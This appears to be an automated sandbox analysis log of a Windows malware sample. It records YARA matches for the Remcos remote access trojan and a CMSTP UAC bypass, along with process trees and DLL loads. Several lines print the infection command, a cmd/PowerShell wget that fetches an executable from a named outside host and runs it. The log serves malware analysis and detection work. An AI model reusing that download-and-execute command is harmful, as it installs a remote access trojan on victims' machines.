Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.troj.expl.evad.winLNK@34/27@2/2

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

11_2_00407776

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_0040118A GetDiskFreeSpaceExW,SendMessageW,

11_2_0040118A

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

11_2_004034C1

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

11_2_00401BDF

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\hello.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2856:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31uaxlx.vs2.ps1

Jump to behavior

Source: Yara match	File source: 12.0.DZIPR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1378606402.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1381062753.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\DZIPR.exe, type: DROPPED

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exe
Source: C:\Users\user\AppData\Roaming\hello.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
Source: C:\Users\user\DZIPR.exe	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
